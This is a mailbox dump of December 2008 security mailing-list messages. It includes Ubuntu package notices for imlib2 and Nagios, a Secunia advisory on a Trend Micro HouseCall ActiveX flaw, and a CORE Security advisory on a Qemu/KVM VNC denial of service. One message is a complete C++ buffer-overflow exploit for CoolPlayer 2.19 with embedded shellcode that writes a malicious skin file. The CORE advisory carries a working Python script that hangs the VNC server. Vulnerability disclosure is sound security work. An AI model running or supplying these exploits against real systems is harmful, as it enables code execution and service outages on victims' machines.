    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.2_amd64.deb
      Size/MD5:   214090 b379ee9c5d678cde9e6766df89695dba

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.2_i386.deb
      Size/MD5:   334468 907b6b0b7f11895b1b32b0886d7a9343
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.2_i386.deb
      Size/MD5:   205802 dc82a1e573a045e487e77dd8dae5fd65

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.2_lpia.deb
      Size/MD5:   341414 516b71217f39e0bc653d2862d1e1db19
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.2_lpia.deb
      Size/MD5:   209358 3cf0224915a3dd16199aafbb49e96c34

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.2_powerpc.deb
      Size/MD5:   362620 634e0878891c1e6308950333718c1bd4
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.2_powerpc.deb
      Size/MD5:   229886 b37e628289bf933f6cd8ecb4e8d6b3ac

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.2_sparc.deb
      Size/MD5:   338862 57c8a21576417e08d2b9b7c4e5ee8db1
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.2_sparc.deb
      Size/MD5:   200926 1f96efa5649dd902157fd7e1ea358a7b

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0-1ubuntu1.2.diff.gz
      Size/MD5:    56663 fb26ad4224322e4ede71f5d70a62638f
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0-1ubuntu1.2.dsc
      Size/MD5:      843 e80fb6a9f642fd8a5c0d4b82b4a20429
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0.orig.tar.gz
      Size/MD5:   845017 1f7f497798e06085767d645b0673562a

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.2_amd64.deb
      Size/MD5:   344524 d023421c4725c4fadb076510ba28f0cb
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.2_amd64.deb
      Size/MD5:   199838 4a7b97363d6af1862911a576703b760a

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.2_i386.deb
      Size/MD5:   309450 b9a5eeb6b5ba08edc7252b25b2df1811
    http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.2_i386.deb
      Size/MD5:   190318 290fda5b18c7dae98526f38a9b324595

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.2_lpia.deb
      Size/MD5:   318168 6cfb7d6f677930908a2dfc4567b2ff7f
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.2_lpia.deb
      Size/MD5:   194220 05f1faaa12d4094a2622cfa70dff086e

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.2_powerpc.deb
      Size/MD5:   336314 665ed6ae263c147a59d4f94a199b0395
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.2_powerpc.deb
      Size/MD5:   211732 d97ee45ecc1b5300b5a8e7e1e9608496

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.2_sparc.deb
      Size/MD5:   314152 f14550d0965519dcc4d5b1c5bc435e64
    http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.2_sparc.deb
      Size/MD5:   181174 c48d4ebd678032ebfc55d19c72d613b5



--=-v6PMMMesb4pmaU5XvSBr
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAklPpaIACgkQLMAs/0C4zNokHgCeOTel2+0KPWYlasO7OjSzIReW
kzAAn3J2oMUI3mc2aUfqY/vr+H9kBUZY
=XpP0
-----END PGP SIGNATURE-----

--=-v6PMMMesb4pmaU5XvSBr--

From - Mon Dec 22 14:49:33 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000053fb
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38992-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id A4256ED202
for <lists@securityspace.com>; Mon, 22 Dec 2008 14:41:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 8B54614389C; Mon, 22 Dec 2008 09:52:57 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24921 invoked from network); 22 Dec 2008 07:36:06 -0000
Date: Mon, 22 Dec 2008 00:39:55 -0700
Message-Id: <200812220739.mBM7dtDD028105@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: writ3r-dont-want-bugtraq-spam-@gmail.com
To: bugtraq@securityfocus.com
Subject: CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit
Status:   

/*
* CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit
*
* Advisory: http://www.bmgsec.com.au/advisory/43/
* Test box: WinXP Pro SP2 English
*
* Code reference is in skin.c, lines 464 - 480
*
* Written and discovered by:
* r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
*/

#include <iostream>
#include <fstream>
#include <cstdlib> //exit

using namespace std;

int main()
{
    //win32_exec -  EXITFUNC=process CMD�lc.exe Size51 Encoder=PexAlphaNum http://metasploit.com
    //Bad characters: 0x00, 0x0d, 0xf4
    char scode[]         "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
        "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
        "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
        "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
        "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
        "\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x53\x4b\x38\x4e\x57"
        "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38"
        "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48"
        "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
        "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
        "\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38"
        "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x30\x4b\x54"
        "\x4b\x38\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58"
        "\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43"
        "\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x33\x45\x58\x42\x4c\x4a\x47"
        "\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x47\x4e\x31\x4d\x4a"
        "\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"
        "\x42\x50\x42\x50\x42\x30\x4b\x38\x4a\x36\x4e\x53\x4f\x35\x41\x53"
        "\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
        "\x42\x45\x4a\x46\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x46\x4a\x39"
        "\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46"
        "\x4e\x36\x43\x46\x50\x32\x45\x46\x4a\x37\x45\x46\x42\x30\x5a";

    char buffer[1918];
    char eip[] = "\x27\x38\x03\x7d"; //jmp esp

    cout << "[*] Generating payload\n";
    strcpy(buffer, "[CoolPlayer Skin]\nPlaylistSkin=");

    int i;
    for (i=0; i<1534; i++)
        buffer[31+i] = 'A';

    for (i=0; i<sizeof(eip); i++)
        buffer[1565+i] = eip[i];

    for (i=0; i<sizeof(scode); i++)
        buffer[1569+i] = scode[i];

    ofstream outStream;
    outStream.open("cp.ini");

    outStream << buffer;

    outStream.close();

    cout << "[+] Skin file created.\n";

    return 0;
}

From - Mon Dec 22 14:49:34 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000053fc
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39003-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 25FE0ED18B
for <lists@securityspace.com>; Mon, 22 Dec 2008 14:47:26 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 263A3143A13; Mon, 22 Dec 2008 09:59:29 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 2024 invoked from network); 22 Dec 2008 15:48:58 -0000
Date: Mon, 22 Dec 2008 17:07:31 +0100
Message-Id: <200812221607.mBMG7VY2030099@ca.secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: Trend Micro HouseCall ActiveX Control Arbitrary Code Execution
From: Secunia Research <remove-vuln@secunia.com>
Status:   

=====================================================================
                     Secunia Research 22/12/2008

   - Trend Micro HouseCall ActiveX Control Arbitrary Code Execution -

=====================================================================Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

=====================================================================1) Affected Software 

* Trend Micro HouseCall ActiveX Control 6.51.0.1028 and 6.6.0.1278

NOTE: Other versions may also be affected.

=====================================================================2) Severity 

Rating: Highly critical
Impact: System comprimse
Where:  Remote

=====================================================================3) Vendor's Description of Software 

"Trend Micro� HouseCall is an application for checking whether your 
computer has been infected by viruses, spyware, or other malware. 
HouseCall performs additional security checks to identify and fix 
vulnerabilities to prevent reinfection."

Product Link:
http://housecall.trendmicro.com/

=====================================================================4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Trend Micro 
HouseCall, which can be exploited by malicious people to compromise a 
user's system.

The vulnerability is caused due to an implementation error within the
HouseCall ActiveX control (Housecall_ActiveX.dll). This can be 
exploited to e.g. download and load an arbitrary library file by 
specifying a custom update server.

Successful exploitation allows execution of arbitrary code.

=====================================================================5) Solution 

Remove the ActiveX control and install version 6.6.0.1285.
http://prerelease.trendmicro-europe.com/hc66/launch/

HouseCall Server Edition:
Apply hotfix B1285.

=====================================================================6) Time Table 

18/08/2008 - Vendor notified.
19/08/2008 - Vendor response.
02/09/2008 - Vendor acknowledges vulnerability.
03/09/2008 - Vendor asks if version 6.6 is also affected.
03/09/2008 - Vendor informed that version 6.6 is not available.
09/09/2008 - Vendor informs that version 6.6 site is now accessible.
18/09/2008 - Vendor informed that version 6.6 is not affected by the
             current exploit, but will be checked in-depth later.
23/09/2008 - Vendor informed that version 6.6 is also vulnerable
             when using a slightly modified exploit.
27/09/2008 - Vendor provides status update.
13/11/2008 - Status update requested.
13/11/2008 - Vendor provides status update.
14/11/2008 - Vendor provides hotfix for testing.
14/11/2008 - Informed the vendor that the supplied hotfix does not 
             address the vulnerability properly.
18/11/2008 - Vendor requests updated exploit.
19/11/2008 - Updated exploit sent to the vendor.
22/12/2008 - Status update requested.
22/12/2008 - Vendor informs that hotfix for SA31583 also fixes this
             vulnerability.
22/12/2008 - Public disclosure.

=====================================================================7) Credits 

Discovered by Alin Rad Pop, Secunia Research.

=====================================================================8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2008-2434 for the vulnerability.

=====================================================================9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

=====================================================================10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-32/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================
From - Mon Dec 22 14:59:34 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000053fd
X-Mozilla-Status: 0001
X-Mozilla-Status2: 10000000
Return-Path: <bugtraq-return-39002-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id DD869ED1A1
for <lists@securityspace.com>; Mon, 22 Dec 2008 14:54:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 273E91439FF; Mon, 22 Dec 2008 09:55:49 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 32467 invoked from network); 22 Dec 2008 14:21:34 -0000
Delivered-To: azulcasa.security@jbanetwork.com
Received-SPF: neutral (google.com: 91.189.94.204 is neither permitted nor denied by best guess record for domain of ubuntu-security-announce-bounces@lists.ubuntu.com) client-ip�.189.94.204;
Authentication-Results: mx.google.com; spf=neutral (google.com: 91.189.94.204 is neither permitted nor denied by best guess record for domain of ubuntu-security-announce-bounces@lists.ubuntu.com) smtp.mail=ubuntu-security-announce-bounces@lists.ubuntu.com
Subject: [USN-698-1] Nagios vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -4.2
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.74.0.149
Date: Mon, 22 Dec 2008 09:35:54 -0500
Message-Id: <1229956554.23276.8.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.24.2 
X-Mailman-Approved-At: Mon, 22 Dec 2008 14:38:54 +0000
Cc: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
X-BeenThere: ubuntu-security-announce@lists.ubuntu.com
X-Mailman-Version: 2.1.8
Reply-To: ubuntu-users@lists.ubuntu.com
Content-Type: multipart/mixed; boundary="==============u93390678581637214=="
Mime-version: 1.0
Sender: ubuntu-security-announce-bounces@lists.ubuntu.com
Errors-To: ubuntu-security-announce-bounces@lists.ubuntu.com
Status:   


--==============u93390678581637214=Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-8LLLPFZXuFgeDvsoXmCd"


--=-8LLLPFZXuFgeDvsoXmCd
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-698-1          December 22, 2008
nagios vulnerability
CVE-2008-5027
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  nagios-common                   2:1.3-cvs.20050402-8ubuntu8

After a standard system upgrade you need to restart Nagios to effect
the necessary changes.

Details follow:

It was discovered that Nagios did not properly parse commands submitted using
the web interface. An authenticated user could use a custom form or a browser
addon to bypass security restrictions and submit unauthorized commands.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3-cvs.20050402-8ubuntu8.diff.gz
      Size/MD5:    70914 96d8036bdb33aadd3141715039c91b24
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3-cvs.20050402-8ubuntu8.dsc
      Size/MD5:      959 0393336015bf452f5dfeb74d75245311
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios_1.3-cvs.20050402.orig.tar.gz
      Size/MD5:  1621251 0f92b7b8e705411b7881d3650cbb5d56

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-common_1.3-cvs.20050402-8ubuntu8_all.deb
      Size/MD5:  1218132 d18e298ee16f4c6c6b7c5969c46044e6

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-cvs.20050402-8ubuntu8_amd64.deb
      Size/MD5:  1030206 085483fdefd0d7bc43e55dbc5be2bcd6
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-cvs.20050402-8ubuntu8_amd64.deb
      Size/MD5:  1041656 09fc7bb2ff11062603680d09e290909b
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-cvs.20050402-8ubuntu8_amd64.deb
      Size/MD5:  1025618 61619d13effd9a4970486abf5933c756

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-cvs.20050402-8ubuntu8_i386.deb
      Size/MD5:   877846 544afaebec24e7e94d2ce1da3a89346c
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-cvs.20050402-8ubuntu8_i386.deb
      Size/MD5:   886544 411d3ca5a204aa41a4a42ef6e5f56453
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-cvs.20050402-8ubuntu8_i386.deb
      Size/MD5:   872936 aa31f6d1fb8a081a206eae3d6bfb3dd6

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-cvs.20050402-8ubuntu8_powerpc.deb
      Size/MD5:  1015630 540a27062c7f8612b7f460b2bcfd93b9
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-cvs.20050402-8ubuntu8_powerpc.deb
      Size/MD5:  1024374 47e0480006df0b20a83f67b56da7a9f8
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-cvs.20050402-8ubuntu8_powerpc.deb
      Size/MD5:   993324 03a67a7675075050a672a4c515e8e0c3

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-mysql_1.3-cvs.20050402-8ubuntu8_sparc.deb
      Size/MD5:   918810 7340348f043dd884c88bd016ee30e41d
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-pgsql_1.3-cvs.20050402-8ubuntu8_sparc.deb
      Size/MD5:   926172 e9ccf388b828a17e868807aa39cb5b51
    http://security.ubuntu.com/ubuntu/pool/main/n/nagios/nagios-text_1.3-cvs.20050402-8ubuntu8_sparc.deb
      Size/MD5:   917374 c88dec0d93f590f8a93ebbc701696f68



--=-8LLLPFZXuFgeDvsoXmCd
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAklPpccACgkQLMAs/0C4zNpo0QCgj3got0/fA54JEE3r7V0OKpcd
pnMAni9+CEXeT1lKpcrf+kG2OkubVK8R
=ayx5
-----END PGP SIGNATURE-----

--=-8LLLPFZXuFgeDvsoXmCd--



--==============u93390678581637214=Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

-- 
ubuntu-security-announce mailing list
ubuntu-security-announce@lists.ubuntu.com
Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce

--==============u93390678581637214==--


From - Mon Dec 22 15:09:34 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000053ff
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39004-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3D564ED1CE
for <lists@securityspace.com>; Mon, 22 Dec 2008 15:08:21 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id ED666236FF7; Mon, 22 Dec 2008 12:50:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 6497 invoked from network); 22 Dec 2008 17:12:15 -0000
Message-ID: <494FCEB4.7060206@coresecurity.com>
Date: Mon, 22 Dec 2008 15:30:28 -0200
From: CORE Security Technologies Advisories <advisories@coresecurity.com>
Organization: CORE Security Technologies
MIME-Version: 1.0
To: Bugtraq <bugtraq@securityfocus.com>,
Vulnwatch <vulnwatch@vulnwatch.org>,
full-disclosure@lists.grok.org.uk
Subject: CORE-2008-1210: Qemu and KVM VNC server remote DoS
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

            Qemu and KVM VNC server remote DoS



1. *Advisory Information*

Title: Qemu and KVM VNC server remote DoS
Advisory ID: CORE-2008-1210
Advisory URL: http://www.coresecurity.com/content/vnc-remote-dos
Date published: 2009-12-22
Date of last update: 2008-12-19
Vendors contacted: Qemu and KVM teams
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Denial of service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 32910
CVE Name: N/A


3. *Vulnerability Description*

The VNC server of Qemu and KVM virtualization solutions are vulnerable
to a remote DoS, when specially crafted packets are received by the host
VNC server causing an infinite loop.

Successful exploitation causes the host server to enter an infinite loop
and cease to function. The vulnerability can be triggered remotely by
external hosts or virtualized guests. No special privileges are required
to perform the Denial of Service.


4. *Vulnerable packages*

   . Qemu 0.9.1 and older
   . kvm-79 and older


5. *Vendor Information, Solutions and Workarounds*

Qemu and KVM teams will release patches that fix this vulnerability.


6. *Credits*

This vulnerability was discovered and researched by Alfredo Ortega from
Core Security Technologies.


7. *Technical Description / Proof of Concept Code*

The function 'protocol_client_msg()' in the file 'vnc.c' ('qemu/vnc.c'
in kvm-66) is in charge of processing incoming VNC low-level messages. A
listing of the vulnerable source follows:

/-----------

vnc.c
1185: static int protocol_client_msg(VncState *vs, uint8_t *data, size_t
len)
1186: {
1187:     int i;
1188:     uint16_t limit;
1189:
1190:     switch (data[0]) {

...

1201:     case 2:
1202: if (len == 1)
1203:     return 4;
1204:
1205: if (len == 4)
1206:     return 4 + (read_u16(data, 2) * 4);

- -----------/

 When the VNC server receives a message consisting of '\x02\x00\x00\x00'
the 'read_u16()' function will return zero, and an infinite loop will be
triggered, because this function will be called with the len parameter
always equal to 4.


7.1. *Proof of Concept*

The following python script implements a basic VNC client that triggers
the vulnerability on the VNC server.

*NOTE:* Some VNC servers like KVM, don't bind to 0.0.0.0 by default, but
the server can still be reached from a guest VM when no VNC client is
attached.


/-----------

Example:

Launch vulnerable qemu:

~$qemu ./test.img - -vnc 0.0.0.0:0

Launch attack:

~$python qemu-kvm-DoS.py localhost 5900

- -----------/



/-----------

##
## vnc remote DoS
##

import socket
import time
import struct
import sys

if len(sys.argv)<3:
print "Usage: %s host port" % sys.argv[0]
exit(0)

host = sys.argv[1] # "127.0.0.1" # debian 4
port = int(sys.argv[2]) # 5900

s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
# rec-send versions
srvversion = s.recv(100)
cliversion=srvversion
s.send(cliversion)
print "Server version: %s" % srvversion

#Security types

sec=s.recv(100)
print "Number of security types: %d" % ord(sec[0])
s.send(sec[1])

# Authentication result
auth=s.recv(100)
if auth=="\x00\x00\x00\x00":
print "Auth ok."

# Share desktop flag: no
s.send("\x00")

# Server framebuffer parameters:
framebuf=s.recv(100)

# Trigger the bug
s.send("\x02\x00\x00\x00\x00\xff"+struct.pack("<L",1)*5)

s.close()

- -----------/



8. *Report Timeline*

. 2008-12-10: Core Security Technologies notifies the Qemu, Xen and KVM
teams of the vulnerability.
. 2008-12-11: KVM team acknowledges notification.
. 2008-12-12: Core sends technical details of the vulnerability to the
KVM team.
. 2008-12-13: KVM team informs that it will inform the Qemu team, since
the vulnerable code is inherited from Qemu.
. 2008-12-16: Core replies that the vulnerability is present in Qemu,
KVM and Xen, and that its intention is to coordinate the disclosure of
this issue with the three teams. The proposed publication date is
January 5th, 2009.
. 2008-12-16: Xen team acknowledges notification.
. 2008-12-16: Core sends technical details to the Xen team.
. 2008-12-16: Qemu team confirms the vulnerability, and has patches ready.
. 2008-12-17: Xen informs that they are not vulnerable.
. 2008-12-17: Core proposes to disclose the issue on December 22nd,
2008, if both Qemu and KVM have patches ready.
. 2008-12-18: Qemu and KVM teams agree to publish the issue on Dec 22.
. 2008-12-22: The advisory CORE-2008-1210 is published.


9. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


10. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
